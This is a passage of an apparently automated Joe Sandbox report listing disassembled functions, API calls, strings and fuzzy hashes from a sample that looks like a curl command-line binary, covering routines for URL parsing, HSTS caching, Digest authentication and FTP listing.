Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrstrncmpstrtol
String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
API String ID: 236576716-4202423297
Opcode ID: ea66e66f635a10ee913415ed4b666e46a14a7d751e1163329a7156d8b52c3b36
Instruction ID: 1d0932cac9ff21ac0c5ee2a144da961bb766ff07372bd2707eb95f1d764111db
Opcode Fuzzy Hash: ea66e66f635a10ee913415ed4b666e46a14a7d751e1163329a7156d8b52c3b36
Instruction Fuzzy Hash: F451A834905299AFDB748F2AE8417FC7BEAEF45314F2040AAE880B7392D7308845CB90

Function 000E0830 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 141fileCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E08DD
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000E08F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E093F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E096E
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0992
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,000E126F), ref: 000E0A02
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0A14

Strings

Set-Cookie:, xrefs: 000E09A0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fclosefree$__acrt_iob_funccallocfopenmalloc
String ID: Set-Cookie:
API String ID: 3610089413-2427311273
Opcode ID: 6e975d00edfd9f76189c074bece2245c20c4e007e94ff50028b9a33398b28a99
Instruction ID: 264a8984b3386967a8eca7a76aab5fc619546607ea5f3e500a3910badfb64e8b
Opcode Fuzzy Hash: 6e975d00edfd9f76189c074bece2245c20c4e007e94ff50028b9a33398b28a99
Instruction Fuzzy Hash: 9F412A317047819FE7245F29A8447ADBBD59B84710F18806EF985B72C3DEE08CC686E6

Function 000C1411 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 135COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0( ,?,?,?,?,?,?,?,?,?), ref: 000C14A3
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?,?,?,?,?,?,?), ref: 000C1536
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 000C154F

Strings

<= Recv header, xrefs: 000C1430
%s%s, %zu bytes (0x%zx), xrefs: 000C1432
, xrefs: 000C149E
%04zx: , xrefs: 000C1464
%02x , xrefs: 000C1489

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fflushfputcfputs
String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)$<= Recv header
API String ID: 2904194729-208095841
Opcode ID: 51626955c10b860ad2451d53bd48d3e04dd690aeaade61ce7779ba87851349e8
Instruction ID: 834b7c0b1592e5b668c9c8ccaef38ac314958b79868c77fe0d534eb3d0048667
Opcode Fuzzy Hash: 51626955c10b860ad2451d53bd48d3e04dd690aeaade61ce7779ba87851349e8
Instruction Fuzzy Hash: 4B41AE72A04258EBDF29CF54DD85AED7BB1EF46314F14406AF816AA242C2719EA1CB90

Function 000CE2DD Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 125COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 000CE314
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CE346
__aulldiv.LIBCMT ref: 000CE39A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CE3CF

Strings

%7I64dd, xrefs: 000CE3F0
--:--:--, xrefs: 000CE2FD
%3I64dd %02I64dh, xrefs: 000CE3DA
%2I64d:%02I64d:%02I64d, xrefs: 000CE37E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
API String ID: 1185945948-1858174321
Opcode ID: 8f40f5c20e6ac19e0c26b8bd5a6be9035ea007d04b8ad856bbb4efe58b9123d7
Instruction ID: 28de0d396f1be4386614df0e171dcb07b01e47d1b9e151f45fab9f5804d53101
Opcode Fuzzy Hash: 8f40f5c20e6ac19e0c26b8bd5a6be9035ea007d04b8ad856bbb4efe58b9123d7
Instruction Fuzzy Hash: 9631E671B003947AEB2566698C4BFAF6DADCBD5B50F148038B904F7183E6B19F508664

Function 000C7BEB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000C7BFD

Part of subcall function 000D09FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 000D0A07

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7C56
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7CB1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7CC1

Strings

unsupported range point, xrefs: 000C8216
Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 000C7C99
%I64d-, xrefs: 000C7C40
A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 000C7C26

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr_errno_strdup
String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
API String ID: 4096323884-1864133270
Opcode ID: 71973822aff8fb2b7fc6294063969475c87bbb158af0a73b0c9487bc17110044
Instruction ID: 851cd008ccd78c924344a10637e782b5dd4a708fa32437c2767ba16352c682a0
Opcode Fuzzy Hash: 71973822aff8fb2b7fc6294063969475c87bbb158af0a73b0c9487bc17110044
Instruction Fuzzy Hash: 4621A97120C3029EE7689B309D86FBF77DA9F94300F24481EF59AD61C2DF71E8459A16

Function 000CF352 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 203COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 000CF58A

Strings

%s set to a %s, xrefs: 000CF523
blobpointer, xrefs: 000CF4F0, 000CF51E, 000CF570
curl_easy_setopt(hnd, %s, %s);, xrefs: 000CF575
functionpointer, xrefs: 000CF444
curl_easy_setopt(hnd, %s, "%s");, xrefs: 000CF569
%ldL, xrefs: 000CF3FA
(curl_off_t)%I64d, xrefs: 000CF4A7
objectpointer, xrefs: 000CF470

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 1294909896-2831394677
Opcode ID: 97340a6354fe12119d6dcdbcd33fadcaf3e6e05d4c1e6cfeb771a71b013bb24f
Instruction ID: 0b24f13581a29267c3c1eda9de50cc44c61ffaa0900c461be86c5939a27cf7ab
Opcode Fuzzy Hash: 97340a6354fe12119d6dcdbcd33fadcaf3e6e05d4c1e6cfeb771a71b013bb24f
Instruction Fuzzy Hash: E3610172608382ABCB21DF248840EBF7BE6AF99354F18443DF98997282D231DD44C793

Function 000F4EF7 Relevance: 13.6, APIs: 9, Instructions: 121COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,HTTP,?,?), ref: 000F4F12
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000005C,?,?,00000000,HTTP,?,?), ref: 000F4F25
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000002F), ref: 000F4F34
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F4F9C
_mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,?,?), ref: 000F4FAC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F4FC0
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000F4FC9
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5000
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5013

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_mbschr_strdup$_mbsnbcpymalloc
String ID:
API String ID: 103568399-0
Opcode ID: a9c8f2f688d8bc8c63c5013b48087470967afd86c17b8bce3a1951d9fb60e69f
Instruction ID: a9d8efb006501275c17cccd49522a768db0ab80f3576c9db069e664b515c2284
Opcode Fuzzy Hash: a9c8f2f688d8bc8c63c5013b48087470967afd86c17b8bce3a1951d9fb60e69f
Instruction Fuzzy Hash: 7A312732904A06EFCB195F68EC185AE7BF6EF84310B24807AF505DB651DF70C8419BD0

Function 001004E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00100503
_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 001005B7
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001005C6
_write.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00100673
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001006EE

Strings

Can't get the size of %s, xrefs: 001005CE
Can't open %s for writing, xrefs: 00100565

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _close$___from_strstr_to_strchr_fstat64_write
String ID: Can't get the size of %s$Can't open %s for writing
API String ID: 2085843339-3544860555
Opcode ID: f3f021fd29ed5c9240176cf3c5d979521e644b8146a5b3a2db50174b68f6485e
Instruction ID: f7f42e8de12f7e268a0e90d7d2dfcba262164c1d9e3a71934a364f11fb09b6ec
Opcode Fuzzy Hash: f3f021fd29ed5c9240176cf3c5d979521e644b8146a5b3a2db50174b68f6485e
Instruction Fuzzy Hash: 27617471E042049BDF29DFA8DD91BAD77A2AF8C310F284139EC49EB285EBB15D518B50

Function 00111E40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00111E77
___except_validate_context_record.LIBVCRUNTIME ref: 00111E7F
_ValidateLocalCookies.LIBCMT ref: 00111F08
__IsNonwritableInCurrentImage.LIBCMT ref: 00111F33
_ValidateLocalCookies.LIBCMT ref: 00111F88

Strings

csm, xrefs: 00111FB3
csm, xrefs: 00111F1D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: ae2d8aafdd21da130af495a37a24acdcd1c86e458b431248bcda7637fa94a9a3
Instruction ID: 31921464b7fbb31bde62e29ae5d4478e94bca16b44736450f43a4fd53726d6d4
Opcode Fuzzy Hash: ae2d8aafdd21da130af495a37a24acdcd1c86e458b431248bcda7637fa94a9a3
Instruction Fuzzy Hash: DF51BF34A01209AFCF18DF68C844AEEBBB1AF59314F1481B9ED155B2A2C731DDD6CB91

Function 000E6510 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

%s.%s.tmp, xrefs: 000E6583
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000E65B9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%s.%s.tmp
API String ID: 0-2507297550
Opcode ID: 238356f5d7ae8aafa585d2f81e7684c75a785ed2f7229ee1cd44d4f76baaaa26
Instruction ID: c6c35a01ea566ed184045fc4e5c4c86ced94e6e68c2b291166975770db875597
Opcode Fuzzy Hash: 238356f5d7ae8aafa585d2f81e7684c75a785ed2f7229ee1cd44d4f76baaaa26
Instruction Fuzzy Hash: 9741C332E006559FDF248F55E841AEEB7F5EF687A0F24402AEC01B7281DB71AD418BA0

Function 000E136B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E13E6
___from_strstr_to_strchr.LIBCMT ref: 000E142F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E149A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E14DD

Strings

%sAuthorization: Digest %s, xrefs: 000E14B9
%.*s, xrefs: 000E143E
Proxy-, xrefs: 000E14B0, 000E14B8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr
String ID: %.*s$%sAuthorization: Digest %s$Proxy-
API String ID: 622630536-541442569
Opcode ID: 3d22c99da81116ab7d10d324c1a284a85b2c564f7ffb2a073d070af66a86ea02
Instruction ID: 3f31bf2b1225cadb3baa2944450860d9952ce0e905437c2303068f7cb6b50c90
Opcode Fuzzy Hash: 3d22c99da81116ab7d10d324c1a284a85b2c564f7ffb2a073d070af66a86ea02
Instruction Fuzzy Hash: 99414C71A0425AAFDB14DFA9D840AEEBBF5EF48310F10806AE815E7392D7709941CBA1

Function 000C500A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00118C2C), ref: 000C505C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C5070
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00118C2C), ref: 000C5097
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,00118C2C), ref: 000C50A2
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C512B
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C513C

Strings

pkcs11:, xrefs: 000C5041

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdup$mallocstrcspnstrncpystrpbrk
String ID: pkcs11:
API String ID: 1722728043-2446828420
Opcode ID: 97b414a47f5456b10dfd0a76fc5eb9fd7e09961259a2ea8bce6c543e7e5be0de
Instruction ID: 322f58066e5b678fb798992bfe909b5580b4f852fe7b8fe640d9e29ffadd97dc
Opcode Fuzzy Hash: 97b414a47f5456b10dfd0a76fc5eb9fd7e09961259a2ea8bce6c543e7e5be0de
Instruction Fuzzy Hash: 86411438204A819BDB364B28DC94BAE7FE59F97352F2C409DD8858B382D7B05CC2C761

Function 000FF42A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 000FF47D
htons.WS2_32(?), ref: 000FF491
send.WS2_32(?,?,00000003,00000000), ref: 000FF51A
WSAGetLastError.WS2_32(?,00000001), ref: 000FF524
send.WS2_32(?,?,00000002,00000000), ref: 000FF55A
WSAGetLastError.WS2_32(?,00000001), ref: 000FF564

Strings

Sending data failed (%d), xrefs: 000FF52B, 000FF56B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLasthtonssend
String ID: Sending data failed (%d)
API String ID: 2027122571-2319402659
Opcode ID: 74dd0202b010ce13a87a00af7b813c6717a868031b369e1ac8e4dfb162676f50
Instruction ID: 8a567e524e0c02c5d6d2b860cd4c91066afc32f30408401c4bfc4625be5c848f
Opcode Fuzzy Hash: 74dd0202b010ce13a87a00af7b813c6717a868031b369e1ac8e4dfb162676f50
Instruction Fuzzy Hash: 8841E771248255DFD7129F68C885DBD77E5EF29720F2409A9FAC2CB292D730A841CBA0

Function 000D5117 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872

___from_strstr_to_strchr.LIBCMT ref: 000D5198
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A,?,00000000,00000000,?,?,?,?,?,?,000D5B5D,00000000), ref: 000D51D4

Strings

[%*45[0123456789abcdefABCDEF:.]%c%n, xrefs: 000D5136
%*[^]]%c%n, xrefs: 000D515F
%ld, xrefs: 000D51F0
][, xrefs: 000D5238
], xrefs: 000D5172

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr__stdio_common_vsscanfstrtol
String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n$]$][
API String ID: 1045171823-685413583
Opcode ID: 8b4b0505f6c47773f4bb5405dd998f90e865c3852135a9cab1125d0c74b6c2f6
Instruction ID: 3148da2ae724f29bfb04617c0ffde2ce6f4def8ad2e269bad16c51c226a6a0c5
Opcode Fuzzy Hash: 8b4b0505f6c47773f4bb5405dd998f90e865c3852135a9cab1125d0c74b6c2f6
Instruction Fuzzy Hash: 15314635E00719BEEB308B689C41BFE7BEC9F16701F24006BEC45E7382D6609D8586B1

Function 000C77E3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113stringfileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C781F
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000C7833
strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,00118E74), ref: 000C786E
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00118E74), ref: 000C78A2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C78B7
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C78CA

Strings

p, xrefs: 000C78E0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strtok$__acrt_iob_funcfclosefopenfree
String ID: p
API String ID: 896044852-2181537457
Opcode ID: 77f364d97d9f7f094c0219c38a468f12b9cc1450d7d34538b9bdf7f061849ecc
Instruction ID: c583043a6fd51aeb35f6d4f99fe043764fb157286b178a71169bc63cd1dee1ff
Opcode Fuzzy Hash: 77f364d97d9f7f094c0219c38a468f12b9cc1450d7d34538b9bdf7f061849ecc
Instruction Fuzzy Hash: BF31D43560C7429FC359CB348898FAE77E5BB95354F64892DF19A83281EF70D849CB11

Function 000FB26F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000FB2B9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FB2E3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?), ref: 000FB33A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?), ref: 000FB372

Part of subcall function 000D2813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D2848

Strings

NLST, xrefs: 000FB2F7, 000FB31A
LIST, xrefs: 000FB2FC
%s%s%s, xrefs: 000FB31B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strrchrmalloc
String ID: %s%s%s$LIST$NLST
API String ID: 685622329-959297966
Opcode ID: 44564e5cd6a5474dcf82a39a14ede7ff082c21c2d2a12691f575eaed3c3948d6
Instruction ID: efe1b1e34b9678ac43f076b1fe15aed4dd718ffa01e8d34583e288dd57dbc939
Opcode Fuzzy Hash: 44564e5cd6a5474dcf82a39a14ede7ff082c21c2d2a12691f575eaed3c3948d6
Instruction Fuzzy Hash: 87310932701619AFDB189B68DC817BE77E9EF44354F10803EE901E7681D7709D419B91

Function 000CD05C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000CD097
_strrchr.LIBCMT ref: 000CD0AF
_strrchr.LIBCMT ref: 000CD0C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000CD118

Strings

%s%s, xrefs: 000CD0ED
%s/%s, xrefs: 000CD0F4, 000CD0FD
://, xrefs: 000CD06A

Memory Dump Source

